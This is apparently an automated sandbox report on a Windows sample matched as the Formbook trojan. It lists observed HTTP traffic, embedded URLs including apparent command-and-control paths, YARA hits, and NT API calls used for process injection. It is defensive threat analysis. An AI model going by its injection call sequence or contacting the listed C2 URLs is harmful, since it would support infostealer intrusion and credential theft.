            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://sorenad.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Thu, 07 Dec 2023 14:54:20 GMT server: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:54:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:54:57 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:00 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:03 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 07 Dec 2023 14:55:06 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:09 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:11 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:55:14 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://blessingstation.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 14735Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Dec 2023 14:56:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000049AA000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://blessingstation.org/m858/?GJ=C4IdWhJXSFOXR8D&yRV=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3Qs
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004818000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000003B88000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.00000000031C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hillcresthealth.online/?ts=fE1vYmlsZUNsZWFuQmxhY2t8fDQ3OWMwfGJ1Y2tldDAwM3x8fHx8fDY1NzFkY2YzYT
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003B34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004818000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: BMhDm7YW62.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: BMhDm7YW62.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000003D1A000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000335A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004362000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.00000000039A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJ
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3738071578.0000000005023000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3738071578.0000000005023000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.633922.com/m858/
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000B.00000003.1663641702.0000000007D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 0000000B.00000003.1607031484.00000000075F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: typeperf.exe, 0000000B.00000002.3733581608.0000000002E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com/track.
            Source: typeperf.exe, 0000000B.00000003.1612269174.000000000771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 0000000B.00000003.1610295741.000000000763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: typeperf.exe, 0000000B.00000002.3736723872.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000B.00000002.3739281446.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000430E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lan
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_h
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utm
            Source: typeperf.exe, 0000000B.00000002.3736723872.000000000403E000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.000000000367E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_auto
            Source: typeperf.exe, 0000000B.00000002.3736723872.00000000044F4000.00000004.10000000.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735732006.0000000003B34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2

            E-Banking Fraud

            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.okawzsv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.okawzsv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A063 NtGetContextThread,5_2_0040A063
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A8A3 NtCreateSection,5_2_0040A8A3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A273 NtSetContextThread,5_2_0040A273
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040AAC3 NtMapViewOfSection,5_2_0040AAC3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040B393 NtDelayExecution,5_2_0040B393
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004283B3 NtClose,5_2_004283B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040ACF3 NtCreateFile,5_2_0040ACF3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040A483 NtResumeThread,5_2_0040A483
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00409E53 NtSuspendThread,5_2_00409E53
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040AF23 NtReadFile,5_2_0040AF23
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_0040B7B3 NtAllocateVirtualMemory,5_2_0040B7B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2B60 NtClose,LdrInitializeThunk,5_2_00AA2B60
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00AA2C70
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00AA2DF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA35C0 NtCreateMutant,LdrInitializeThunk,5_2_00AA35C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA4340 NtSetContextThread,5_2_00AA4340
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA4650 NtSuspendThread,5_2_00AA4650
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA2AB0 NtWaitForSingleObject,5_2_00AA2AB0
